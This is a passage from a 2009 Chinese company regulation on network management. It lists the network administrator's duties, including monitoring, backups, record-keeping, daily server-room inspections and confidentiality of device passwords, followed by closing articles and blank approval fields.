E、监视网络运行,调整网络参数,调度网络资源,保持网络安全、稳定、畅通。F、负责系统备份和网络数据备份;负责各部门电子数据资料的整理和归档。G、保管网络拓扑图、网络接线表、设备规格及配置单、网络管理记录、网络运行记录、网络检修记录等网络资料。
H、每天对机房进行巡检,定期对本公司网络的效能和各电脑性能进行评价,提出网络结构、网络技术和网络管理的改进措施。
I、应不定期的查看网络系统,监视和分析系统的运行情况,确保计算机系统网络的正常运行。
J、中心管理的所有服务器、交换机、路由器的用户名和密码口令为绝密资料,由网络管理员负责,必须妥善保管,不得泄漏内容。
第十七条 本制度由XX科技有限公司负责解释
第十八条 本制度自公布之日起执行
二○○九年七月二十一日
拟
稿:
审 核:
签 发: 发送部门:公司各部门 呈报部门:总经理室